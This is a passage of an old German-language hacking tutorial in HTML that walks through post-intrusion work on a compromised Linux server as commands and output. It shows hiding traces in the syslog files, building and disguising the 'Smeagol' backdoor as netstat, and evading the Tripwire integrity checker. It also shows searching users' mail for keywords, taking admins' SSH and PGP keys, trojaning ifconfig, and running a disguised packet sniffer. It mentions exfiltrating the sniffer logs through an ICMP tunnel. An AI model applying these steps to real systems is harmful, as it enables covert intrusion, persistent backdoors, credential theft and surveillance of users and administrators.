+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 199 May 28 21:12
+httpd.error_log</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0 May 28 21:14 httpd.access_log</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3925 May 28 21:53
+Config.bootup</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jun 14 11:29
+.</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1871 Jul&nbsp; 7 09:04
+boot.msg</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 519707 Jul&nbsp; 7 09:04 warn</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 15842 Jul&nbsp; 7 09:04
+mail</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 24 Jul&nbsp;
+7 13:42 faillog</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 16096 Jul&nbsp; 7 13:42
+lastlog</font>
+<br><font color="#FF0000">-rw-rw-r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+tty&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 207984 Jul&nbsp; 7 13:42
+wtmp</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 92502 Jul&nbsp; 7 13:49
+messages</font>
+<p><font color="#000000">Hier haben wir uns die Syslog-Files nochmal genauer
+angesehen und unsere Spuren verwischt.</font>
+<br><font color="#000000">Mit <b>fuser</b> kannst du unter anderem die
+PID des Processes feststellen, welcher ein bestimmte Datei benutzt.</font>
+<br><font color="#000000">In diesem Fall gehoert, wie zu erwarten, die
+PID 85 zu <b>syslogd</b>. Wir benoetigen die PID um <b>syslogd</b> das
+HUP-Signal zu senden, welches <b>syslogd</b> veranlasst die Logfiles neu
+zu oeffnen. Dies ist noetig, weil <b>syslogd</b> sonst einen <i>Inode </i>benutzt
+zu dem es kein File mehr, in unserem Fall </font><font color="#33FF33">messages</font><font color="#000000">,
+im Verz.</font><font color="#33FF33"> /var/log</font><font color="#000000">
+existiert.</font>
+<br><font color="#000000">Das Dumme an der Sache ist nur, dass <b>syslogd</b>
+eine Restart-Message in die Logfiles schreibt.</font>
+<br><font color="#000000">Jetzt fragst du dich sicherlich: "Warum erzaehlt
+der Typ mir den ganzen Gammel und macht es dann selbst nicht?"</font>
+<br><font color="#000000">Die Antwort ist einfach: Wir erzeugen keinen
+neuen <i>Inode </i>indem wir die Daten kopieren und nicht moven. Somit
+vermeiden wir zusaetzlich die Restart-Message von <b>syslogd</b>.</font>
+<br><font color="#000000">Wenn <b>syslogd</b> wichtige Logs zur Console
+oder zu einem TTY schreibt (s. </font><font color="#33FF33">/etc/syslog.conf</font><font color="#000000">),
+dann kannst du mit:</font>
+<br><font color="#FF0000">bash# yes " " > /dev/console</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#000000">den Bildschirm loeschen.</font>
+<br><font color="#000000">Wenn Logs auf einem Printer</font> ausgedruckt
+werden, dann sieht's relativ schlecht aus. Entweder hoffst du, dass das
+Papier/das Farbband leer war oder, dass der Admin es nicht sieht. ;)
+<br>Es ist mit einiger Wahrscheinlichkeit auch moeglich das Papier um einige
+Zeile zurueckzuschieben und deine Entries mehrmals mit anderen Kram zu
+ueberschreiben. Ich hab's noch nie ausprobiert und ueberlasse es deiner
+Phantasie und deinem Koennen das Problem zu loesen.
+<br>Mehr 'Glueck' hat man da schon, wenn die Daten auf einen extra Loghost
+gehen (du kannst nur beten, das sie nicht einfach eine Serielle-Verbindung
+benutzen); den du dann natuerlich hacken musst; oder es besser sein laesst,
+weil du dadurch nur die Aufmerksamkeit der Admins auf dich ziehst.
+<br>Die ganz paranoiden unter euch (was nicht unbedingt schlecht ist) sollten
+noch <b>identd</b> ersetzen; der TCP-Wrapper, Firewalls, etc benutzen <b>identd</b>
+um den Usernamen auf dem Remote Host zu eruieren.
+<p><font color="#FF0000">bash# cd /tmp/".. "</font>
+<br><font color="#FF0000">bash# tar xf smeagol_v4.4.4.tar</font>
+<br><font color="#FF0000">bash# cd V4.4.4</font>
+<br><font color="#FF0000">bash# make</font>
+<br><font color="#FF0000">cp smeagol.h.gen smeagol.h</font>
+<br><font color="#FF0000">make -f Makefile.gen</font>
+<br><font color="#FF0000">make[1]: Entering directory `/tmp/.. /V4.4.4'</font>
+<br><font color="#FF0000">cc&nbsp; -c cmds.c</font>
+<br><font color="#FF0000">cc -DGENERIC -c remove.c</font>
+<br><font color="#FF0000">cc -c stdnet.c error.c</font>
+<br><font color="#FF0000">cc&nbsp; -c smeagol.c</font>
+<br><font color="#FF0000">cc -c tty-intruder.c</font>
+<br><font color="#FF0000">cc -c auth.c</font>
+<br><font color="#FF0000">cc&nbsp; -c ah.c</font>
+<br><font color="#FF0000">cc -c strhide.c</font>
+<br><font color="#FF0000">cc -O2 -o smeagol cmds.o remove.o stdnet.o error.o
+smeagol.o tty-intruder.o auth.o ah.o strhide.o</font>
+<br><font color="#FF0000">strip smeagol</font>
+<br><font color="#FF0000">make[1]: Leaving directory `/tmp/.. /V4.4.4'</font>
+<br><font color="#FF0000">bash# mv smeagol "netstat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+"</font>
+<br><font color="#FF0000">bash# ./netstat*</font>
+<br><font color="#FF0000">LOCK&lt;-KEY:</font>
+<br><font color="#FF0000">bash# telnet</font>
+<br><font color="#FF0000">telnet> o localhost 1524</font>
+<br><font color="#FF0000">Trying 127.0.0.1...</font>
+<br><font color="#FF0000">Connected to localhost.</font>
+<br><font color="#FF0000">Escape character is '^]'.</font>
+<p><font color="#FF0000">hixer</font>
+<p><font color="#FF0000"><font size=+4>WELCOME</font></font>
+<br><font color="#FF0000"><font size=+4>CYBERSPAWN</font></font>
+<br>&nbsp;
+<p><font color="#FF0000">[/] Simon says: helpme</font>
+<br><font color="#FF0000">bye&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+:&nbsp; close Session</font>
+<br><font color="#FF0000">remove &lt;user>&nbsp;&nbsp;&nbsp;&nbsp; :&nbsp;
+starts Simple Nomad's LogCleaner</font>
+<br><font color="#FF0000">maskas &lt;user>&nbsp;&nbsp;&nbsp; :&nbsp;&nbsp;
+mask Process with EUID of &lt;user></font>
+<br><font color="#FF0000">cd &lt;direc>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+:&nbsp; make a chdir() call</font>
+<br><font color="#FF0000">ttyhij &lt;tty>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+:&nbsp; hijack a TTY session</font>
+<br><font color="#FF0000">accth&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+:&nbsp; Start Zhart's Acct Handler (not available)</font>
+<br><font color="#FF0000">helpme&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+:&nbsp; You guessed it right...</font>
+<p><font color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+Smeagol was written by</font>
+<br><font color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+TICK</font>
+<br>&nbsp;
+<p><font color="#FF0000">[/] Simon says: bye</font>
+<br><font color="#FF0000">Bye</font>
+<br>&nbsp;
+<p><font color="#FF0000">Connection closed by foreign host.</font>
+<br><font color="#FF0000">bash#</font>
+<p><font color="#000000">Um uns den Remote-Zugang zum System zu erhalten
+benutzen wir einen Backdoor-Server.</font>
+<br><font color="#000000">Falls ich einen Backdoor-Server verwende benutze
+ich meinen eigenen. </font>Smeagol&nbsp; ist sehr gut darin seine Existenz
+<br>zu verschleiern aber leider laeuft er bisher nur auf AIX und Linux.
+Fuer andere Systeme koennen z.B. simple Perl-Backdoors benutzt werden oder
+portiere Smeagol einfach zu 'nem anderen Unix-Derivat und sende mir dann
+bitte deine Version.
+<br>Nunja, am Betsen ist es natuerlich ein Backdoor-LKM zu verwenden, aber
+es ist schwer an die noetigen Informationen fuer die verschieden Unix-Abkoemmlinge
+zu gelangen - frag' mal in den News rum.
+<br>Es ist sehr wichtig, dass du vor der Installation den genauen Pfad
+zu den Logfiles, das Passwort und die richtigen Namen fuer die Daemons,
+fuer die sich Smeagol ausgeben soll, angibst. Falls auf dem System das
+<i>Process-Accounting
+</i>aktiviert
+worden ist musst du auch dafuer die entsprechenden Aenderungen im Source-Code
+und im Makefile machen.
+<br>Zum Aendern der verschluesselten Strings solltest du <b>convert</b>
+benutzen. Als XOR-Value (F1) musst du den Default-XOR-Wert angeben, der
+als Define in 'strhide.h' verwendet wird. Der Output muss gefixt werden
+(F3).
+<br>Ich habe Smeagol nach <font color="#000000">"netstat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+" ge'movet um argv[0] gross genug zu machen, damit beim Ueberschreiben
+der Process-Tableeintraege nicht die hinteren Buchstaben abgeschnitten
+werden, und desweiteren sieht der Aufruf von <b>netstat</b> ungefaehrlicher
+aus als der Aufruf von <b>smeagol </b>- spez. beim Proc-Acct.</font>
+<p><font color="#FF0000">bash# cd /var/cron/tabs</font>
+<br><font color="#FF0000">bash# ls -al</font>
+<br><font color="#FF0000">&nbsp;total 3</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 25 11:56
+./</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 3 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 20:57
+../</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 258 Jan 25 11:56
+root</font>
+<br><font color="#FF0000">bash# cat root</font>
+<br><font color="#FF0000"># DO NOT EDIT THIS FILE - edit the master and
+reinstall.</font>
+<br><font color="#FF0000"># (/tmp/crontab.326 installed on Sat Jul 25 11:56:24
+1998)</font>
+<br><font color="#FF0000"># (Cron version -- $Id: crontab.c,v 2.13 1994/01/17
+03:20:37 vixie Exp $)</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># run Tripwire at 3.00 pm every day</font>
+<br><font color="#FF0000">00 15 * * * (/root/bin/runtw)</font>
+<br><font color="#FF0000">bash# cd /root/bin</font>
+<br><font color="#FF0000">bash# file runtw</font>
+<br><font color="#FF0000">runtw: Bourne shell script text</font>
+<br><font color="#FF0000">bash# cat runtw</font>
+<br><font color="#FF0000">#!/bin/sh</font>
+<br><font color="#FF0000">/bin/mount -r -t ext2 -v /dev/fd0 /fd0/tripwire
+|| exit 1</font>
+<br><font color="#FF0000">/fd0/tripwire/bin/tripwire</font>
+<br><font color="#FF0000">/bin/umount /dev/fd0</font>
+<p><font color="#FF0000">exit 0</font>
+<br><font color="#FF0000">bash# mount -t ext2 /dev/fd0 /mnt</font>
+<br><font color="#FF0000">mount: block device /dev/fd0 is write-protected,
+mounting read-only</font>
+<br><font color="#FF0000">/dev/fd0 on /mnt type ext2 (ro)</font>
+<br><font color="#FF0000">bash# cd /mash# cd /mnt</font>
+<br><font color="#FF0000">bash# ls -al</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 .</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 4 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 ..</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:40
+Config</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:34
+Databases</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:57
+bin</font>
+<br><font color="#FF0000">bash# ls -alR .</font>
+<br><font color="#FF0000">total 5</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 .</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 4 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 ..</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:40
+Config</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:34
+Databases</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:57
+bin</font>
+<p><font color="#FF0000">Config:</font>
+<br><font color="#FF0000">total 4</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:40
+.</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 ..</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 387 Jul 23 13:34
+tw.config</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 387 Jul 23 13:40
+tw.config.bak</font>
+<p><font color="#FF0000">Databases:</font>
+<br><font color="#FF0000">total 2</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:34
+.</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 ..</font>
+<p><font color="#FF0000">bin:</font>
+<br><font color="#FF0000">total 425</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 23 13:57
+.</font>
+<br><font color="#FF0000">drwx------&nbsp;&nbsp; 5 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul 29&nbsp;
+1997 ..</font>
+<br><font color="#FF0000">-rwxr-xr-x&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 128745 Jul 23 13:45 tripwire</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 299814 Jul 29&nbsp; 1997 tripwire-1.2.tar.gz</font>
+<br><font color="#FF0000">bash# cd Config</font>
+<br><font color="#FF0000">bash# cat tw.config</font>
+<br><font color="#FF0000"># Check root's binaries</font>
+<br><font color="#FF0000">/root/bin</font>
+<p><font color="#FF0000"># Check TripWire's Database-, Config- and TAR-File</font>
+<br><font color="#FF0000">/fd0/tripwire</font>
+<p><font color="#FF0000"># Check System-Files and -Binaries</font>
+<br><font color="#FF0000">/etc/passwd</font>
+<br><font color="#FF0000">/etc/skel</font>
+<br><font color="#FF0000">/etc/aliases</font>
+<br><font color="#FF0000">/etc/exports</font>
+<br><font color="#FF0000">/etc/fstab</font>
+<br><font color="#FF0000">/etc/ftpusers</font>
+<br><font color="#FF0000">/etc/group</font>
+<br><font color="#FF0000">/etc/hosts</font>
+<br><font color="#FF0000">/etc/inetd.conf</font>
+<br><font color="#FF0000">/etc/inittab</font>
+<br><font color="#FF0000">/etc/lilo.conf</font>
+<br><font color="#FF0000">/etc/profile</font>
+<br><font color="#FF0000">/etc/sendmail.cf</font>
+<br><font color="#FF0000">/etc/sudoers</font>
+<br><font color="#FF0000">/etc/syslog.conf</font>
+<br><font color="#FF0000">/bin</font>
+<br><font color="#FF0000">/usr/bin</font>
+<br><font color="#FF0000">/usr/local/bin</font>
+<br><font color="#FF0000">bash#</font>
+<p><font color="#000000">Bevor wir irgendwelche Files ersetzen oder aendern
+sollten wir ueberpruefen ob die Admins einen Integry-Checker zum Schutz
+vor Trojan-Horses etc. einsetzen. Auf diesem Rechner ist das der Fall.
+Grundsaetzlich kann ich nur sagen, dass du niemals so sicherheitsrelevante
+Files, wie z.B. '/etc/passwd' oder '/etc/inetd.conf', veraendern solltest;
+egal wie clever du vorgehst, die Admins werden es immer entdecken und meistens
+eher frueher als spaeter. Dasselbe gilt fuer SUID-Shells. Ich kann auch
+nur davon abraten die Tripwire-DB zu manipulieren, was in diesem Fall auch
+garnicht moeglich ist, da sich die DB auf 'ner write-protected Floppy befindet.</font>
+<br><font color="#000000">Natuerlich koenntest du fuer Linux die weit verbreiteten
+Loadable-Kernel-Modules (LKMs) verwenden um die Syscalls zu verbiegen,
+damit du dein Trojan-Horse in den Kernel verlegst, oder spez. fuer Tripwire,
+die Zugriffe auf die geschuetzten Files manipulierst. Ich halte solche
+Eingriffe in das System fuer zu Aufwendig und folglich Auffaellig. Was
+mir hingegen gefaellt sind gute LKMs, die die Praesenz von bestimmten Dingen,
+wie Files, User, LKMs etc, verbergen. Mit soeinem 'Hide-LKM' ist es dann
+auch moeglich SUID-Shell im System zu verschtecken.</font>
+<p><font color="#FF0000">bash# cd /tmp/".. "</font>
+<br><font color="#FF0000">bash# cat > wl.mail</font>
+<br><font color="#FF0000">hacker</font>
+<br><font color="#FF0000">cracker</font>
+<br><font color="#FF0000">intrusion</font>
+<br><font color="#FF0000">security</font>
+<br><font color="#FF0000">break-in</font>
+<br><font color="#FF0000">hack</font>
+<br><font color="#FF0000">password</font>
+<br><font color="#FF0000">login</font>
+<br><font color="#FF0000">account</font>
+<br><font color="#FF0000">tripwire</font>
+<br><font color="#FF0000">integry</font>
+<br><font color="#FF0000">sniffer</font>
+<br><font color="#FF0000">cpm</font>
+<br><font color="#FF0000">ifconfig</font>
+<br><font color="#FF0000">military</font>
+<br><font color="#FF0000">.ml</font>
+<br><font color="#FF0000">.gov</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#FF0000">bash# cat > wl.log</font>
+<br><font color="#FF0000">source.ass</font>
+<br><font color="#FF0000">johnny</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#FF0000">bash# ./searcher -vvv -rnf -m wl.mail -l wl.log
+> s.res &amp;</font>
+<br><font color="#FF0000">[1] 454</font>
+<br><font color="#FF0000">bash#</font>
+<p>Searcher&nbsp; sucht nun nach den angegeben Wortern in den E-Mails der
+User bzw. in den Syslog-Files (doppelt haelt besser) und zuseatzlich verschafft
+es uns weitere Informationen, die uns den Zugang zu anderen Systemen ermoeglichen
+koennen.
+<br>Searcher ist auch sehr nuetzlich, wenn du Informationen ueber ganz
+bestimmte Sachen suchst, z.B. ueber irgendwelche Forschungs-Projekte, die
+sich natuerlich mit Internet-Security &amp; Co. beschaeftigen, oder wenn
+du Daten ueber deine Noten im Verwaltungs-Server deiner Uni suchst ;).
+Um die Suche etwas zu beschleunigen kannst du dich nur auf ausgewaehlte
+Gruppen von Usern beschraenken.
+<br>Am besten ist es wenn du Searcher schon frueh startest, da er viel
+Zeit benoetigt.
+<br>Das Resultat von Searcher's Arbeit kannst du am besten mit 'gzip --best'
+komprimieren, mit 'uuencode' ausgeben lassen und nach dem Hack aus deinen
+Logs extrahieren um es zu analysieren.
+<p>Jetzt ist der richtige Zeitpunkt gekommen um sich um die Admins zu kuemmern.
+<br>Du solltest dir von jedem Admin das Home-Direc. angucken, dein Augenmerk
+sollte dabei auf das Bin-Direc. und das History-File fallen (SSH-, PGP-Keys
+und .Xauthority Files solltest du dir als Bonus mitnehmen). Du wirst mit
+Sicherheit weitere Securitytools, wie z.B. <b>cpm</b> (<i>Promiscuous-Mode</i>
+Checker), finden, und das History-File gibt dir Auskunft ueber das Verhalten
+der Admins, z.B.: auf welchen Rechner sie arbeiten, ob sie das root-Passwort
+kennen, welche Befehle sie ausfuehren und demnach welche Aufgaben sie haben.
+<br>Wenn Admins haeufig <b>su</b> ausfuehren und dabei nicht den vollen
+Path angeben sind sie ein perfektes Ziel fuer spaetere PATH/Trojan-Horse
+Attacken.
+<p><font color="#FF0000">bash# which ifconfig</font>
+<br><font color="#FF0000">/sbin/ifconfig</font>
+<br><font color="#FF0000">bash# cd /tmp/".. "</font>
+<br><font color="#FF0000">bash# fix /sbin/ifconfig ./ifconfig ./ic.bak</font>
+<br><font color="#FF0000">fixer: Last 17 bytes not zero</font>
+<br><font color="#FF0000">fixer: Can't fix checksum</font>
+<br><font color="#FF0000">bash# showmount -e localhost</font>
+<br><font color="#FF0000">/cdrom&nbsp; pc-01.pool.domain.com</font>
+<br><font color="#FF0000">bash# mv linsniffer nfsiod</font>
+<br><font color="#FF0000">bash# export PATH=.:$PATH</font>
+<br><font color="#FF0000">bash# nfsiod</font>
+<p><font color="#000000">Als letztes installieren wir noch unseren <i>Ethernet-Sniffer</i>.
+Wir ersetzen <b>ifconfig</b> mit einer modifizierten Version, die nicht
+anzeigt ob eine Netzwerkarte in den <i>Promiscuous-Mode </i>geschalltet
+ist. Falls ein Admin <b>cpm</b> o.ae. benutzt, solltest du es ebenfalls
+ersetzen - aber denke immer an Integry-Checker, in diesem Fall ist '/sbin'
+nicht Teil der Tripwire-DB. Auf hochsicheren Rechnern wuerde ich niemals
+Prog.s ersetzen, da die Wahrscheinlichkeit hoch ist, dass sich doch irgendwo
+ein Integry-Checker verbirgt, den man uebersehen hat (im Fall des Sniffers
+waere es denkbar ein LKM in den Kernel zu laden um den <i>ioctl()</i> Systemcall
+zu verbiegen und das PROMISC Flag nicht mehr anzuzeigen).</font>
+<br><font color="#000000">Frueher wurde haeufig das Prog. <b>sum</b> fuer
+die Checksum-Erstellung benutzt, leider (?) erstellt <b>sum</b> kryptographisch
+unsichere Hashwerte. Das Tool <b>fix</b>/<b>fixer</b> nutzt diesen 'Fehler'
+aus, ich habe es hier nur verwendet, weil es die Zeiten anpasst und ein
+Backup erstellt. Da <b>sum</b> so gut wie garnicht mehr benutzt wird ist
+es auch nicht wichtig, dass die Checksum nicht gefixt wurde, falls du es
+aber doch besser findest, dann haenge einfach ein paar Nullen an dein Trojan-Horse
+undzwar wie folgt</font>
+<br><font color="#FF0000">bash# cat /dev/zero >> ./ifconfig</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#000000">Anschliesend starten wir den Sniffer nachdem
+wir ihm einen unauffaelligen Namen verpasst haben. Wenn der Admin irgendein
+Verzeichnis exportiert, das jedermann mounten kann, dann solltest du dein
+Snifflog-File dorthin schreiben lassen. Aber ich bevorzuge die </font>Collector-Library&nbsp;
+oder noch besser, insbesondere bei Firewalls, die&nbsp; ICMP-Tunnel-Library
+.
+<br>Kleine Anekdote: Ich hab' mal 'ne Zeit lang meine Snifferlogs via ICMP-Tunnel
+von 'nem Bastion-Host zu 'nem auslaendischen Rechner 'geschmuggelt'; es
+funktionierte wunderbar und wurde nicht endeckt.
+<p><font color="#FF0000">bash# mount</font>
+<br><font color="#FF0000">/dev/hda4 on / type ext2 (rw)</font>
+<br><font color="#FF0000">proc on /proc type proc (rw)</font>
+<br><font color="#FF0000">/dev/hda1 on /dos type msdos (rw)</font>
+<br><font color="#FF0000">/dev/hda2 on /tmp type ext2 (rw)</font>
+<br><font color="#FF0000">nfsserver:/nfs_mnt/usr on /usr type nfs (ro,intr,addr=10.255.0.34)</font>
+<p><font color="#FF0000">bash# showmount -e nfsserver</font>
+<br><font color="#FF0000">Export list for nfsserver:</font>
+<br><font color="#FF0000">/nfs_mnt/usr victim.domain.com</font>
+<br><font color="#FF0000">[...]</font>
